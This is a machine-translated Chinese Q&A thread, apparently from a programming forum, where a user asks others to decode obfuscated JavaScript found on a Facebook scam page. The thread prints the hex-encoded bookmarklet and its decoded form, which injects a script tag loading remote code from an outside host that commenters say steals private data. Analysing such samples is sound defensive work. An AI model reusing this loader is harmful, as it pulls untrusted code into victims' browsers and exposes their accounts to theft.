有人可以解码这个JavaScript?
问题描述:
我在Facebook病毒页面here中发现了这个javascript。我认为代码是恶意的,所以我想知道它的作用。 下面是代码:有人可以解码这个JavaScript?
javascript: var _0xa064=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x64\x74\x67\x2D\x63\x73\x2E\x68\x6F\x73\x74\x6F\x69\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x65\x73\x6F\x72\x69\x63\x61\x2F\x66\x75\x72\x6B\x61\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xa064[2]](_0xa064[1]))[_0xa064[0]]=_0xa064[3];b[_0xa064[5]][_0xa064[4]](a); void (0);
答
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js';
b['body']['appendChild'](a);
void(0);
答
它创建一个进口
dtg-cs.hostoi.com/profesorica/furka.js
我强烈怀疑是恶意的东西script标签。
编辑 —作为脚本包括各种Ajax请求中,一个叫“阴茎xd.jpg”,我想我们一定可以把它当作恶意:-)文件的引用
+1
该脚本缺少一些半的 – 2011-04-22 14:06:44
+2
哈哈是的,它是 - 我们应该找到他们的bugtracker并记录下来:-) – Pointy 2011-04-22 14:15:05
答
它试图加载:dtg-cs.hostoi.com/profesorica/furka.js
而他注入的脚本很好地评论告诉你他正在窃取什么私人数据:) – Raynos 2011-04-22 13:59:27
你究竟是如何快速解码的? – 2011-04-22 14:03:10
unescape()是我可以想出的最好的方法... – 2011-04-22 14:05:58